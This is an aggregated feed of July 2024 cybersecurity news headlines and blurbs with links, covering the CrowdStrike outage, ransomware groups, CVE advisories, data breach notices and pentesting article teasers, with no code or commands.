In a groundbreaking move, the first state in the U.S. has passed comprehensive legislation aimed at protecting consumers from the potential risks associated with AI. The new Utah Artificial Intelligence... The post Pioneering the New Frontier in AI Consumer Protection and Cyber Defense appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/pioneering-the-new-frontier-in-ai-consumer-protection-and-cyber-defense/

From RA Group to RA World: Evolution of a Ransomware Group
Ransomware gang RA World rebranded from RA Group. We discuss their updated tactics from leak site changes to an analysis of their operational tools. The post From RA Group to RA World: Evolution of a Ransomware Group appeared first on Unit 42.
https://unit42.paloaltonetworks.com/ra-world-ransomware-group-updates-tool-set/

Cursed tapes: Exploiting the EvilVideo vulnerability on Telegram for Android
ESET researchers discovered a zero-day Telegram for Android exploit that allows sending malicious files disguised as videos
https://www.welivesecurity.com/en/eset-research/cursed-tapes-exploiting-evilvideo-vulnerability-telegram-android/

A week in security (July 15 – July 21)
A list of topics we covered in the week of July 15 to July 21 of 2024
https://www.malwarebytes.com/blog/news/2024/07/a-week-in-security-july-15-july-21

The Risks Inherent in Including Security Modules At Kernel Level: Lessons From CrowdStrike Incident
Balancing strong security measures while minimizing operational risks is a constant juggling act in cybersecurity. The recent global outage caused by that bad CrowdStrike update underscores the risks of relying on kernel-level modules for security.
https://linuxsecurity.com/features/features/lessons-from-crowdstrike-incident

Digital Identities Have Evolved — Cyber Strategies Should Too
The scale of identity exposure has increased significantly, with over 90% of surveyed organizations reporting an identity-related breach within the last year. These attacks have long-lasting consequences – SpyCloud’s 2024 Identity Exposure Report found... The post Digital Identities Have Evolved — Cyber Strategies Should Too appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/digital-identities-have-evolved-cyber-strategies-should-too/

How a signed driver exposed users to kernel-level threats – Week in Security with Tony Anscombe
A purported ad blocker marketed as a security solution leverages a Microsoft-signed driver that inadvertently exposes victims to dangerous threats
https://www.welivesecurity.com/en/videos/adware-kernel-level-threats-week-security-tony-anscombe/

File Transfer Cheatsheet: Windows and Linux
File transfer is a crucial step in the post-exploitation scenario while performing penetration testing or red teaming. There are various ways to do the file… The post File Transfer Cheatsheet: Windows and Linux appeared first on Hacking Articles.
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/

Life360 - 442,519 breached accounts
In July 2024, data scraped from a misconfigured Life360 API was posted online after being obtained several months earlier. The records included 443k unique email addresses and in most cases, corresponding names and phone numbers (some records were null or obfuscated). Life360 promptly notified impacted users after the incident was discovered.
https://haveibeenpwned.com/PwnedWebsites#Life360

The Small Cybersecurity Company Winning Big In The Cybersecurity Space
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full InvestorPlace Story. Sausalito, Calif. – Jul. 20, 2024. InvestorPlace reports on Alarum Technologies (NASDAQ: ALAR), a hot publicly-traded company based out of Israel and a global provider of internet access and web… The post The Small Cybersecurity Company Winning Big In The Cybersecurity Space appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/the-small-cybersecurity-company-winning-big-in-the-cybersecurity-space/

Stop Chasing the AI Squirrel and Patch… Just Patch
In the contemporary technological landscape, the allure of advanced artificial intelligence (AI) systems often captivates the collective imagination of the tech industry and beyond. Stories of deepfakes, such as the... The post Stop Chasing the AI Squirrel and Patch… Just Patch appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/stop-chasing-the-ai-squirrel-and-patch-just-patch/

Open Source Vulnerability Assessment Tools & Scanners
Computer systems, software, applications, and other interfaces are vulnerable to network security threats. Failure to find these cybersecurity vulnerabilities can lead to the downfall of a company. Therefore, businesses must utilize vulnerability scanners regularly within their systems and servers to identify existing loopholes and weaknesses that can be resolved through security patching.
https://linuxsecurity.com/features/features/top-6-vulnerability-scanning-tools

CrowdStrike update at center of Windows “Blue Screen of Death” outage
An enormous IT outage across the world today is not the result of a cyberattack, but rather a faulty update from CrowdStrike.
https://www.malwarebytes.com/blog/uncategorized/2024/07/crowdstrike-update-at-center-of-windows-blue-screen-of-death-outage

Security of Custom GitHub Actions
Get details on Legit's research on the security of custom GitHub Actions.
https://www.legitsecurity.com/blog/security-of-custom-github-actions

Number of data breach victims goes up 1,000%
The Identity Theft Resource Center has published a report showing a 1,170% increase in compromised data victims compared to the same quarter last year.
https://www.malwarebytes.com/blog/news/2024/07/number-of-data-breach-victims-goes-up-1000

Metasploit Weekly Wrap-Up 7/19/2024
A new unauthenticated RCE exploit for GeoServer, plus library and Meterpreter updates and enhancements.
https://blog.rapid7.com/2024/07/19/metasploit-weekly-wrap-up-7-19-2024/

Beyond the blue screen of death: Why software updates matter
The widespread IT outages triggered by a faulty CrowdStrike update have put software updates in the spotlight. Here's why you shouldn't dread them.
https://www.welivesecurity.com/en/cybersecurity/beyond-blue-screen-death-software-updates/

Global Microsoft Meltdown Tied to Bad Crowdstrike Update
A faulty software update from cybersecurity vendor Crowdstrike crippled countless Microsoft Windows computers across the globe today, disrupting everything from airline travel and financial institutions to hospitals and businesses online. Crowdstrike said a fix has been deployed, but experts say the recovery from this outage could take some time, as Crowdstrike's solution needs to be applied manually on a per-machine basis.
https://krebsonsecurity.com/2024/07/global-microsoft-meltdown-tied-to-bad-crowstrike-update/

What's happening with the CrowdStrike incident: When a software update turns into a cyber crisis
This morning's CrowdStrike incident, where a routine update caused a cascading failure across thousands of critical systems worldwide, is a stark reminder of the fragile interconnectedness of our digital world. While this incident was a misstep, not malice, it exposes the vulnerability of our essential services.
https://www.sonatype.com/blog/whats-happening-with-the-crowdstrike-incident-when-a-software-update-turns-into-a-cyber-crisis

Guardians of the Grid: Cyber-Secure Microgrids and the Future of Energy Resilience
The Crucial Role of Cyber-Resilient Microgrids
The vulnerability of major metropolitan power grids to natural disasters has become a pressing concern, but mother nature isn't the only thing threatening our... The post Guardians of the Grid: Cyber-Secure Microgrids and the Future of Energy Resilience appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/guardians-of-the-grid-cyber-secure-microgrids-and-the-future-of-energy-resilience/

The complexities of cybersecurity update processes
If a software update process fails, it can lead to catastrophic consequences, as seen today with widespread blue screens of death blamed on a bad update by CrowdStrike
https://www.welivesecurity.com/en/cybersecurity/complexities-cybersecurity-update-processes/

Warning Against the Distribution of Malware Disguised as Software Cracks (Disrupts V3 Lite Installation)
AhnLab SEcurity intelligence Center (ASEC) has previously introduced the dangers of malware disguised as crack programs through a post titled  “Distribution of Malware Under the Guise of MS Office Cracked Versions (XMRig, OrcusRAT, etc.)”. [1] Malware strains disguised as crack programs are primarily distributed through file-sharing platforms, blogs, and torrents, leading to the infection of multiple systems. These infected systems are continually managed by threat actors through periodic updates. In this case, it was confirmed that the threat actor installed different... The post Warning Against the Distribution of Malware Disguised as Software Cracks (Disrupts V3 Lite Installation) appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/68011/

Securing development infrastructure: A new frontier in software supply chain security
Software supply chains are indispensable to modern software development as they drive innovation and efficiency across industries. Yet, as vital as they are, these supply chains are also avenues for threats and attacks.
https://www.sonatype.com/blog/securing-development-infrastructure-a-new-frontier-in-software-supply-chain-security

FortiMail - SMTP Smuggling
Fortinet is aware of the new SMTP smuggling technique. By exploiting interpretation differences of the SMTP protocol for the end-of-data sequence, it is possible to send spoofed e-mails while still passing SPF alignment checks. FortiMail may be susceptible to smuggling attacks if some measures are not put in place. We therefore recommend adhering to the following indications in order to mitigate the potential risk associated with smuggling attacks:
- Enable DKIM (DomainKeys Identified Mail) to enhance e-mail authentication. Select the "None" action under DKIM check in the AntiSpam profile in order to block by default e-mail without a DKIM signature.
- Disable the "any-any" traffic policy to restrict unauthorized access.
- Modify the configuration settings in line with the recommended security practices...
https://fortiguard.fortinet.com/psirt/FG-IR-24-009

Unveiling Key Insights from the 2024 Take Command Summit
The 2024 Take Command Summit, held virtually in partnership with AWS, united over 2,000 security professionals to delve into critical cybersecurity issues.
https://blog.rapid7.com/2024/07/18/unveiling-key-insights-from-the-2024-take-command-summit/

How Continuous Controls Monitoring Solves Traditional GRC Challenges
Originally published by RegScale. Addressing compliance and ensuring strong security measures are increasingly complex tasks for organizations. How can you effectively manage these challenges? Continuous Controls Monitoring (CCM) offers a robust solution, leveraging automation, AI, and real-time data monitoring to enhance governance, risk & compliance (GRC). By tackling key issues such as manual compliance processes, fragmented data management, and reactive risk management, CCM empowers org...
https://cloudsecurityalliance.org/articles/how-continuous-controls-monitoring-solves-traditional-grc-challenges

The Anatomy of Cloud Identity Security
Originally published by CyberArk. Written by Alyssa Miles. There's currently a cybersecurity adage with varying verbiage and claimed origins – the point, however, is unmistakable: “Attackers don't break in. They log in.” This saying underscores the strategic shift associated with cloud adoption's prominence in shaping the digital landscape. New environments have created new attack methods to gain access by logging in rather than infiltrating a perimeter. As technologies continue to advance, we ca...
https://cloudsecurityalliance.org/articles/the-anatomy-of-cloud-identity-security

NHL Attacks Making Waves: Insights on Latest 5 Incidents
Originally published by Astrix. Non-human identity (NHI) attacks are making waves in the cybersecurity landscape, with five high-profile incidents reported in the past few weeks alone. To help you stay on top of this threat vector, our research team provides insights on the latest incidents in this short article. Let's get started.
Incident 1: Snowflake data breach by UNC5537 (May 15, 2024)
Incident overview: One of the largest incidents in recent years, hundreds of Snowflake instances have been ...
https://cloudsecurityalliance.org/articles/nhl-attacks-making-waves-insights-on-latest-5-incidents

Gen Z breakups tainted by login abuse for spying and stalking, research shows
Gen Z, who are most likely to engage in consensual tracking, are also the most likely to face non-consensual tracking after a breakup.
https://www.malwarebytes.com/blog/news/2024/07/gen-z-breakups-tainted-by-login-abuse-for-spying-and-stalking-research-shows

Container Breakouts: Escape Techniques in Cloud Environments
Unit 42 researchers test container escape methods and possible impacts within a Kubernetes cluster using a containerd container runtime. The post Container Breakouts: Escape Techniques in Cloud Environments appeared first on Unit 42.
https://unit42.paloaltonetworks.com/container-escape-techniques/

HotPage: Story of a signed, vulnerable, ad-injecting driver
A study of a sophisticated Chinese browser injector that leaves more doors open!
https://www.welivesecurity.com/en/eset-research/hotpage-story-signed-vulnerable-ad-injecting-driver/

SolarWinds Serv-U Information Disclosure Vulnerability (CVE-2024-28995)
What is the Vulnerability? A Directory Traversal Vulnerability in SolarWinds Serv-U software is being actively exploited in the wild. Tracked as CVE-2024-28995, the vulnerability is due to improper validation of user-supplied inputs. An attacker could exploit this vulnerability by sending crafted requests to the target host machine. Successful exploitation could allow access to read sensitive files on the host machine. CISA added CVE-2024-28995 to its Known Exploited Vulnerabilities (KEV) catalog on July 17, 2024, and publicly available proof-of-concept (PoC) exploit code exists.
What is the recommended Mitigation? Apply the most recent upgrade or patch from the vendor. https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28995
What FortiGuard Coverage is available? FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/5495

Cybersecurity Training for Employees: Upskill the Easy Way with CSA Team Training Programs
The cost and challenge of finding cybersecurity talent is nothing new. Equally challenging is ensuring all stakeholders across your organization have the knowledge they need to stay safe online. The best solution we've found is to train up your existing teams, providing:
- Solid security foundations and cybersecurity awareness for non-technical stakeholders.
- Knowledge of the latest tools and strategies for the technical talent that you've already invested in.
- An aligned security language for every...
https://cloudsecurityalliance.org/articles/cybersecurity-training-for-employees-upskill-the-easy-way-with-csa-group-training-programs

Remote Work, Remote Risks: Strategies for Securing Your Distributed Workforce
Remember that news story a few months ago about a wave of cyberattacks targeting employees… Remote Work, Remote Risks: Strategies for Securing Your Distributed Workforce on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/17/remote-work-remote-risks-strategies-for-securing-your-distributed-workforce/

How HackerOne Organizes a Remote Hack Week

https://www.hackerone.com/culture-and-talent/how-hackerone-organizes-remote-hack-week

Connect with Microsoft Security at Black Hat USA 2024​​
Join Microsoft Security leaders and other security professionals from around the world at Black Hat USA 2024 to learn the latest information on security in the age of AI, cybersecurity protection, threat intelligence insights, and more.​ The post Connect with Microsoft Security at Black Hat USA 2024​​ appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/17/connect-with-microsoft-security-at-black-hat-usa-2024/

Rite Aid says 2.2 million people affected in data breach
Rite Aid has started notifying 2.2 million people who were affected by a data breach that was part of a June ransomware attack.
https://www.malwarebytes.com/blog/news/2024/07/rite-aid-says-2-2-million-people-affected-in-data-breach

Private HTS Program Continuously Used in Attacks
AhnLab SEcurity intelligence Center (ASEC) has previously covered a case where Quasar RAT was distributed through private home trading systems (HTS) in the blog post “Quasar RAT Being Distributed by Private HTS Program“. The same threat actor has been continuously distributing malware, and attack cases have been confirmed even recently. Similar to the previous case, the malware was distributed through an HTS named HPlus. The overall infection flow remains similar, but the initial distribution file, which was previously in the... The post Private HTS Program Continuously Used in Attacks appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67969/

Windows MSHTML Platform Spoofing Vulnerability (CVE-2024-38112)
What is the Vulnerability? CVE-2024-38112 is a spoofing vulnerability in the Windows MSHTML Platform. The attacker can abuse internet shortcuts and Microsoft protocol handlers to execute malicious code. This vulnerability is known to be used by attackers to deliver information stealer malware, and CISA added CVE-2024-38112 to its Known Exploited Vulnerabilities (KEV) catalog on July 9th, 2024.
What is the recommended Mitigation? Microsoft has released a fix for this vulnerability. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112
What FortiGuard Coverage is available? FortiGuard Labs has provided protection through the IPS signature "MS.Office.Internet.Shortcut.File.Remote.Code.Execution" to detect and block any attack attempts targeting the vulnerability (CVE-2024-38112). FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/5494

Progress Telerik Report Server Authentication Bypass Vulnerability
What is the Vulnerability? Progress Telerik Report Server contains an authorization bypass by spoofing vulnerability, allowing an attacker to bypass authentication and create rogue administrator users. The flaw, tracked as CVE-2024-4358, was added to CISA's Known Exploited Vulnerabilities catalog (KEV) in mid-June, and FortiGuard Labs continues to see attack attempts targeting this particular vulnerability.
What is the recommended Mitigation? Apply mitigations as outlined in the vendor advisory: https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
What FortiGuard Coverage is available? FortiGuard Labs has provided protection through the IPS signature "Progress.Telerik.Report.Server.Register.Authentication.Bypass", which was released in mid-June to detect...
https://fortiguard.fortinet.com/threat-signal-report/5480

Incident Response in Cloud Security
Written by Ashwin Chaudhary, CEO, Accedere. Computer security incident response has become an important component of information technology (IT) programs. Cybersecurity-related attacks have become not only more numerous and diverse but also more damaging and disruptive. New types of security-related incidents emerge frequently. Preventive activities based on the results of risk assessments can lower the number of incidents, but not all incidents can be prevented. An incident response capabil...
https://cloudsecurityalliance.org/articles/incident-response-in-cloud-security

Enhancing AI Reliability: Introducing the LLM Observability & Trust API
Written by CSA Research Analysts Marina Bregkou and Josh Buker. Based on the idea presented by Nico Popp in ‘A trust API to enable large language models observability & security (LLMs)'.
Introduction
Large Language Models (LLMs) are becoming integral to numerous applications, from chatbots to complex data analysis tools, in our rapidly evolving world of Artificial Intelligence (AI). The increased adoption of LLMs brings forth significant challenges in terms of security, observability, and t...
https://cloudsecurityalliance.org/articles/enhancing-ai-reliability-introducing-the-llm-observability-trust-api

Defending Against APTs: A Learning Exercise with Kimsuky
The latest research paper coming out of Rapid7 Labs examines the tactics of North Korea's Kimsuky threat group.
https://blog.rapid7.com/2024/07/16/defending-against-apts-a-learning-exercise-with-kimsuky/

DarkGate, the Swiss Army knife of malware, sees boom after rival Qbot crushed

https://www.proofpoint.com/us/newsroom/news/darkgate-swiss-army-knife-malware-sees-boom-after-rival-qbot-crushed

Microsoft Purview Data Governance will be generally available September 1, 2024
Microsoft Purview Data Governance will become generally available to enterprise customers on September 1, 2024. It helps today's data leaders solve their key data governance and security challenges in one unified AI-powered and business-friendly solution. The post Microsoft Purview Data Governance will be generally available September 1, 2024 appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/16/microsoft-purview-data-governance-will-be-generally-available-september-1-2024/

AI device Rabbit r1 logged user interactions without an option to erase them before selling
Rabbit has introduced an option to erase all data from the r1 device before selling it on, but what if you lose it or it gets stolen?
https://www.malwarebytes.com/blog/news/2024/07/ai-device-rabbit-r1-logged-user-interactions-without-an-option-to-erase-them-before-selling-device

2024 DDoS Attack Trends
Unveiling the rise of Hacktivism in a tense global climate.
https://www.f5.com/labs/articles/threat-intelligence/2024-ddos-attack-trends

Announcing The State of GitHub Actions Security Report
Get details on Legit's research on the security of GitHub Actions.
https://www.legitsecurity.com/blog/announcing-the-state-of-github-actions-security-report

Beware of BadPack: One Weird Trick Being Used Against Android Devices
Our data shows a pattern of APK malware bundled as BadPack files. We discuss how this technique is used to garble malicious Android files, creating challenges for analysts. The post Beware of BadPack: One Weird Trick Being Used Against Android Devices appeared first on Unit 42.
https://unit42.paloaltonetworks.com/apk-badpack-malware-tampered-headers/

Brain Cipher Ransomware Attack
What is the attack? A significant ransomware attack has struck Pusat Data Nasional (PDN), one of Indonesia's government-owned national data centers. This incident involved threat actors encrypting government data, which disrupted digital services for immigration, airport checks, and several public services. This ransomware attack represents a new variant of the LockBit 3.0 ransomware. In 2023, the LockBit hacker group also severely disrupted the Bank Syariah Indonesia (BSI) systems.
What is the recommended Mitigation? Ensure that all systems are up to date with robust cybersecurity measures. Also, maintain general awareness and training about the risk of phishing and social engineering attacks in the organization.
What FortiGuard Coverage is available? FortiGuard Labs has AV signatures to block...
https://fortiguard.fortinet.com/threat-signal-report/5479

10 Years of the GitHub Security Bug Bounty Program
Celebrating 10 years of GitHub's bug bounty program! Learn insights into bug bounty growth from a top program.
https://www.hackerone.com/customer-stories/10-years-github-security-bug-bounty-program

WinRM Penetration Testing
Windows Remote Management (WinRM) is a protocol developed by Microsoft for remotely managing hardware and operating systems on Windows machines. It is a component of The post WinRM Penetration Testing appeared first on Hacking Articles.
https://www.hackingarticles.in/winrm-penetration-testing/

The 2024 MES Midmarket 100: Top Companies Serving The Midmarket

https://www.proofpoint.com/us/newsroom/news/2024-mes-midmarket-100-top-companies-serving-midmarket

How an AI “artist” stole a woman's face, with Ali Diamond (Lock and Code S05E15)
This week on the Lock and Code podcast, we speak with Ali Diamond about what it felt like to find an AI image model of herself online.
https://www.malwarebytes.com/blog/podcast/2024/07/how-an-ai-artist-stole-a-womans-face-with-ali-diamond-lock-and-code-s05e15

Researchers: Weak Security Defaults Enabled Squarespace Domains Hijacks
At least a dozen organizations with domain names at domain registrar Squarespace saw their websites hijacked last week. Squarespace bought all assets of Google Domains a year ago, but many customers still haven't set up their new accounts. Experts say malicious hackers learned they could commandeer any migrated Squarespace accounts that hadn't yet been registered, merely by supplying an email address tied to an existing domain.
https://krebsonsecurity.com/2024/07/researchers-weak-security-defaults-enabled-squarespace-domains-hijacks/

With Security Teams Understaffed, Here's How to Maintain a Solid Posture
IT security teams are facing a serious labor shortage, which risks compromising their organizations' security… With Security Teams Understaffed, Here's How to Maintain a Solid Posture on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/15/with-security-teams-understaffed-heres-how-to-maintain-a-solid-posture/

Cybersecurity crisis communication: What to do
Cybersecurity experts tell organizations that the question is not if they will become the target of a cyberattack but when. Often, the focus of response preparedness is on the technical aspects — how to stop the breach from continuing, recovering data and getting the business back online. While these tasks are critical, many organizations overlook […] The post Cybersecurity crisis communication: What to do appeared first on Security Intelligence.
https://securityintelligence.com/articles/cybersecurity-crisis-communication-what-to-do/

How insecure is Avast Secure Browser?
A while ago I already looked into Avast Secure Browser. Back then it didn't end well for Avast: I found critical vulnerabilities allowing arbitrary websites to infect user's computer. Worse yet: much of it was due to neglect of secure coding practices, existing security mechanisms were disabled for no good reason. I didn't finish that investigation because I discovered that the browser was essentially spyware, collecting your browsing history and selling it via Avast's Jumpshot subsidiary. But that was almost five years ago. After an initial phase of denial, Avast decided to apologize and to wind down Jumpshot. It was certainly a mere coincidence that Avast was subsequently sold to NortonLifeLock, called Gen Digital today. Yes, Avast is truly reformed and paying for their crimes in...
https://palant.info/2024/07/15/how-insecure-is-avast-secure-browser/

Protecting Trained Models in Privacy-Preserving Federated Learning
This post is part of a series on privacy-preserving federated learning. The series is a collaboration between NIST and the UK government's Responsible Technology Adoption Unit (RTA), previously known as the Centre for Data Ethics and Innovation. Learn more and read all the posts published to date at NIST's Privacy Engineering Collaboration Space or RTA's blog . The last two posts in our series covered techniques for input privacy in privacy-preserving federated learning in the context of horizontally and vertically partitioned data. To build a complete privacy-preserving federated learning
https://www.nist.gov/blogs/cybersecurity-insights/protecting-trained-models-privacy-preserving-federated-learning

Hello, is it me you're looking for? How scammers get your phone number
Your humble phone number is more valuable than you may think. Here's how it could fall into the wrong hands – and how you can help keep it out of the reach of fraudsters.
https://www.welivesecurity.com/en/scams/hello-is-it-me-youre-looking-for-how-scammers-get-your-phone-number/

Vulnerability In Modern Events Calendar WordPress Plugin Actively Exploited
WordPress admins running the Modern Events Calendar plugin on their websites must rush to update… Vulnerability In Modern Events Calendar WordPress Plugin Actively Exploited on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/15/vulnerability-in-modern-events-calendar-wordpress-plugin-actively-exploited/

Hackers Exploited Windows MSHTML Vulnerability For Over A Year
Researchers revealed that the recently patched Windows MSHTML vulnerability remained under attack for over a… Hackers Exploited Windows MSHTML Vulnerability For Over A Year on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/15/hackers-exploited-windows-mshtml-vulnerability-for-over-a-year/

Google Announced 5x Raise In Its Bug Bounty Program Rewards
A lucrative opportunity to win hefty bounties has arrived for security researchers. Google has increased… Google Announced 5x Raise In Its Bug Bounty Program Rewards on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/15/google-announced-5x-raise-in-its-bug-bounty-program-rewards/

Crooks Steal Phone, SMS Records for Nearly All AT&T Customers
AT&T Corp. disclosed today that a new data breach has exposed phone call and text message records for roughly 110 million people -- nearly all of its customers. AT&T said it delayed disclosing the incident in response to "national security and public safety concerns," noting that some of the records included data that could be used to determine where a call was made or text message sent. AT&T also acknowledged the customer records were exposed in a cloud database that was protected only by a username and password (no multi-factor authentication needed).
https://krebsonsecurity.com/2024/07/hackers-steal-phone-sms-records-for-nearly-all-att-customers/

Metasploit Weekly Wrap-Up 07/12/2024
This week's release features two new exploits targeting Confluence & Ivanti -CVE-2024-21683 and CVE-2024-29824. Learn more!
https://blog.rapid7.com/2024/07/12/metasploit-weekly-wrap-up-07-12-2024/

Brands are changing cybersecurity strategies due to AI threats
 Over the past 18 months, AI has changed how we do many things in our work and professional lives — from helping us write emails to affecting how we approach cybersecurity. A recent Voice of SecOps 2024 study found that AI was a huge reason for many shifts in cybersecurity over the past 12 months. […] The post Brands are changing cybersecurity strategies due to AI threats appeared first on Security Intelligence.
https://securityintelligence.com/articles/brands-changing-cybersecurity-strategies-due-to-ai-threats/

Should ransomware payments be banned? – Week in security with Tony Anscombe
Blanket bans on ransomware payments are a much-debated topic in cybersecurity and policy circles. What are the implications of outlawing the payments, and would the ban be effective?
https://www.welivesecurity.com/en/videos/should-ransomware-payments-be-banned-week-security-tony-anscombe/

Feedback-Driven Interviewing at HackerOne

https://www.hackerone.com/culture-and-talent/feedback-driven-interviewing-hackerone

What HackerOne Customers Say About the Problems Hackers Solve
Learn why organizations work with ethical hackers, like preventing breaches, meeting regulatory compliance, and helping the security budget.
https://www.hackerone.com/customer-stories/hackers-solve-problems

Have you been texted a suspiciously good job offer?

https://www.proofpoint.com/us/newsroom/news/have-you-been-texted-suspiciously-good-job-offer

Simplified Zero Trust security with the Microsoft Entra Suite and unified security operations platform, now generally available
Microsoft is announcing the Microsoft Entra Suite and the unified security operations platform, two innovations that simplify the implementation of your Zero Trust security strategy. The post Simplified Zero Trust security with the Microsoft Entra Suite and unified security operations platform, now generally available appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/07/11/simplified-zero-trust-security-with-the-microsoft-entra-suite-and-unified-security-operations-platform-now-generally-available/

What's New in Rapid7 Products & Services: Q2 2024 in Review
In Q2, we focused on enhancing visualization, prioritization, and integration capabilities across our key products and services.
https://blog.rapid7.com/2024/07/11/whats-new-in-rapid7-products-services-q2-2024-in-review/

39% of MSPs report major setbacks when adapting to advanced security technologies
SOPHOS, a leading global provider of managed security solutions, has recently released its annual MSP Perspectives report for 2024. This most recent report provides insights from 350 different managed service providers (MSPs) across the United States, United Kingdom, Germany and Australia on modern cybersecurity tools and solutions. It also documents newly discovered risks and challenges in […] The post 39% of MSPs report major setbacks when adapting to advanced security technologies appeared first on Security Intelligence.
https://securityintelligence.com/articles/msps-report-setbacks-adapting-advanced-security-technologies/

Beware Of Scam Olympics Ticket Websites, Fans Warned

https://www.proofpoint.com/us/newsroom/news/beware-scam-olympics-ticket-websites-fans-warned

When spear phishing met mass phishing
Kaspersky experts have discovered a new scheme that combines elements of spear and mass phishing
https://securelist.com/spear-phishing-meets-mass/113125/

DarkGate: Dancing the Samba With Alluring Excel Files
We perform an in-depth study of a DarkGate malware campaign exploiting Excel files from early this year, assessing its functionality and its C2 traffic. The post DarkGate: Dancing the Samba With Alluring Excel Files appeared first on Unit 42.
https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/

The Stark Truth Behind the Resurgence of Russia's Fin7
The Russia-based cybercrime group dubbed "Fin7," known for phishing and malware attacks that have cost victim organizations an estimated billion in losses since 2013, was declared dead last year by U.S. authorities. But experts say Fin7 has roared back to life in 2024 -- setting up thousands of websites mimicking a range of media and technology companies -- with the help of Stark Industries Solutions, a sprawling hosting provider that is a persistent source of cyberattacks against enemies of Russia.
https://krebsonsecurity.com/2024/07/the-stark-truth-behind-the-resurgence-of-russias-fin7/

Pentesting for Web Applications
Learn testing methodologies, common vulnerabilities, and best practices for pentesting web applications with PTaaS.
https://www.hackerone.com/penetration-testing/web-applications

Takeaways From The Take Command Summit: Unlocking ROI in Security
Rapid7 CMO Cindy Stanton hosted a discussion with Cindy Stanton, Byron Anderson and Gaël Frouin to talk strategies for measuring team performance at Rapid7's recent Take Command summit.
https://blog.rapid7.com/2024/07/10/takeaways-from-the-take-command-summit-unlocking-roi-in-security/

Deep Dive on Supplement Scams: How AI Drives ‘Miracle Cures' and Sponsored Health-Related Scams on Social Media
Sponsored social media content has become increasingly present on feeds. Sponsored ads can often be beneficial as they are customized to suit online personas, offering relevant content tailored specifically for you. While personalized ads can help enhance your online experience, not all are legitimate. In fact, scams originating from phony ads on social media have increased dramatically, with potentially severe consequences for consumers. Sponsored supplement scams on social media platforms H
https://www.bitdefender.com/blog/labs/deep-dive-on-supplement-scams-how-ai-drives-miracle-cures-and-sponsored-health-related-scams-on-social-media/

Digital solidarity vs. digital sovereignty: Which side are you on?
The landscape of international cyber policy continues to evolve rapidly, reflecting the dynamic nature of technology and global geopolitics. Central to this evolution are two competing concepts: digital solidarity and digital sovereignty. The U.S. Department of State, through its newly released International Cyberspace and Digital Policy Strategy, has articulated a clear preference for digital solidarity, […] The post Digital solidarity vs. digital sovereignty: Which side are you on? appeared first on Security Intelligence.
https://securityintelligence.com/articles/digital-solidarity-vs-digital-sovereignty/

Understanding IoT security risks and how to mitigate them | Cybersecurity podcast
As security challenges loom large on the IoT landscape, how can we effectively counter the risks of integrating our physical and digital worlds?
https://www.welivesecurity.com/en/videos/understanding-iot-security-risks-mitigate-cybersecurity-podcast/

The Heritage Foundation - 72,004 breached accounts
In July 2024, hacktivists published almost 2GB of data taken from The Heritage Foundation and their media arm, The Daily Signal. The data contained 72k unique email addresses, primarily used for commenting on articles (along with names, IP addresses and the comments left) and by content contributors (along with usernames and passwords stored as either MD5 or phpass hashes).
https://haveibeenpwned.com/PwnedWebsites#TheHeritageFoundation

Distribution of AsyncRAT Disguised as Ebook
1. Overview AhnLab SEcurity intelligence Center (ASEC) covered cases of AsyncRAT being distributed via various file extensions (.chm, .wsf, and .lnk). [1] [2] In the aforementioned blog posts, it can be seen that the threat actor used normal document files disguised as questionnaires to conceal the malware. In a similar vein, there have been cases recently where the malware was disguised as an ebook. 2. Malware Executed via Scripts The compressed file disguised as an ebook contains a malicious LNK file disguised... The post Distribution of AsyncRAT Disguised as Ebook appeared first on ASEC BLOG.
https://asec.ahnlab.com/en/67861/

Microsoft Patch Tuesday, July 2024 Edition
Microsoft Corp. today issued software updates to plug 139 security holes in various flavors of Windows and other Microsoft products. Redmond says attackers are already exploiting at least two of the vulnerabilities in active attacks against Windows users.
https://krebsonsecurity.com/2024/07/microsoft-patch-tuesday-july-2024-edition/

Neiman Marcus - 31,152,842 breached accounts
In May 2024, the American luxury retailer Neiman Marcus suffered a data breach which was later posted to a popular hacking forum. The data included 31M unique email addresses, names, phone numbers, dates of birth, physical addresses and partial credit card data (note: this is insufficient to make purchases). The breach was traced back to a series of attacks against the Snowflake cloud service which impacted 165 organisations worldwide.
https://haveibeenpwned.com/PwnedWebsites#NeimanMarcus

Developing and prioritizing a detection engineering backlog based on MITRE ATT&CK
How a SOC can efficiently manage priorities when writing detection logic for various MITRE ATT&CK techniques and what tools can help.
https://securelist.com/detection-engineering-backlog-prioritization/113099/

A decade of global cyberattacks, and where they left us
The cyberattack landscape has seen monumental shifts and enormous growth in the past decade or so. I spoke to Michelle Alvarez, X-Force Strategic Threat Analysis Manager at IBM, who told me that the most visible change in cybersecurity can be summed up in one word: scale. A decade ago, “‘mega-breaches’ were relatively rare, but now […] The post A decade of global cyberattacks, and where they left us appeared first on Security Intelligence.
https://securityintelligence.com/articles/decade-global-cyberattacks-where-they-left-us/

Q1 2024 Cyber Attacks Statistics
